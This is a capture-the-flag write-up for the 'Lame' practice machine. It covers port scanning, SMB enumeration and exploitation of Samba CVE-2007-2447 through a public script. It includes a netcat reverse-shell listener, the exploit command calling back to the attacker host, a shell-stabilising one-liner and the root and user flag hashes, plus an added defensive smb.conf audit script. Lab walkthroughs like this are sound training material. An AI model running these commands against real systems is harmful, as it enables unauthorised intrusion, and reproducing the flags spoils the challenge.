Lame

Write-up author: jon-brandy

DESCRIPTION:

  • NONE

HINT:

  • NONE

STEPS:

  1. First, run nmap against the machine's host so we can see all open ports and the services running.

```bash
nmap -p- -sV -O -sVC 10.10.10.3
```

RESULT

image

image

  1. Notice there are two ports that might be running some type of network shares. Not only that, we're allowed to log in to FTP as anonymous.

image

image

  1. Now let's log in with FTP.

RESULT

image

  1. Let's check whether there are any files or directories.

RESULT

image

  1. Got nothing.
  2. Now let's do SMB enumeration.

```bash
smbmap -H 10.10.10.3
```

RESULT

image

  1. Notice two shares that differ from the others -> tmp and opt (they don't have a dollar sign).

image

NOTES:

tmp and opt don't have a dollar sign, which means they can be accessed with regular user privileges.
  1. Since tmp is the only share with read and write permissions, tmp is our interest now. The problem is that we don't have any user credentials for this tmp share.
  2. Even though it's shown as open here, we still need user credentials to log in to it.
  3. Now let's use searchsploit to see if there's an exploit associated with the version of Samba running on this machine.

RESULT

```bash
searchsploit samba 3.0.2
```

image

  1. Based on the first output.

image

  1. We could use Metasploit, but let's not use that tool; we want to dive in manually. Let's start by finding where this exploit is stored on our Kali Linux and grabbing its CVE number.

image

RESULT

```bash
cat /usr/share/exploitdb/exploits/unix/remote/16320.rb | grep CVE
```

image

  1. Let's jump to the URL given.

RESULT

image

image

  1. Based on the Samba documentation, we know there's a configuration option, not enabled by default, that can lead to RCE.
  2. Anyway, when I searched the CVE number on Google, I found this GitHub repository:
https://github.com/amriunix/CVE-2007-2447
  1. Before running the script, run `nc -nlvp 4444` so we can catch the reverse shell it spawns.
  2. Next, run this payload:

```bash
python3 usermap_script.py 10.10.10.3 139 10.10.14.4 4444
```

RESULT

image

image
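As an added defender-side example (not part of this write-up or of the linked CVE-2007-2447 repository): the Samba option referred to above is `username map script`, and CVE-2007-2447 is the command injection through it. The script below audits an smb.conf for that option and for guest-writable shares like the tmp share smbmap showed; the config text is a constructed sample, not the Lame machine's real configuration.

```python
import configparser

# Constructed smb.conf sample (not the Lame machine's real config) with the
# two risky settings this write-up relies on: the "username map script"
# option behind CVE-2007-2447 and a guest-writable share like tmp.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   security = user
   username map script = /etc/samba/scripts/mapusers.sh

[tmp]
   path = /tmp
   read only = no
   guest ok = yes

[opt]
   path = /opt
   read only = yes
   guest ok = yes
"""

def audit_smb_conf(text):
    """Return (section, finding) tuples for risky smb.conf settings."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    findings = []
    # Any non-empty "username map script" is the CVE-2007-2447 injection path.
    if cp.has_section("global") and cp["global"].get("username map script", "").strip():
        findings.append(("global", "username map script set: remove it or upgrade Samba (CVE-2007-2447)"))
    for name in cp.sections():
        if name == "global":
            continue
        s = cp[name]
        # Samba booleans are yes/no; "public" is an alias of "guest ok".
        guest = s.getboolean("guest ok", fallback=False) or s.getboolean("public", fallback=False)
        # "read only" defaults to yes; "writable"/"writeable" override it.
        writable = (s.getboolean("writable", fallback=False)
                    or s.getboolean("writeable", fallback=False)
                    or not s.getboolean("read only", fallback=True))
        if guest and writable:
            findings.append((name, "guest-accessible writable share"))
        elif guest:
            findings.append((name, "guest-accessible share"))
    return findings

if __name__ == "__main__":
    for section, finding in audit_smb_conf(SAMPLE_SMB_CONF):
        print(f"[{section}] {finding}")
```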

  1. Let's type id and whoami.

RESULT

image

  1. We are root, that's great! We don't need privilege escalation to solve this challenge, then.
  2. The next thing to do now is to stabilize our shell.
  3. Let's run this Python command:

```bash
python -c 'import pty; pty.spawn("/bin/sh")'
```

RESULT

image

  1. Now let's list all files or directories inside the machine.

RESULT

image

  1. Jump to the root directory.

INSIDE

image

  1. Cat the root.txt file.

RESULT

image

  1. Got the flag!

FLAG

46b24a994e2c264192df7f7c060f1fdd

GET THE USER.TXT FILE

  1. Simply go to the home directory, then into makis.

RESULT

image

  1. Cat the user.txt file.

RESULT

image

  1. User owned!

USER

f6b0bf444d16b49c167fffea3e7a9f5a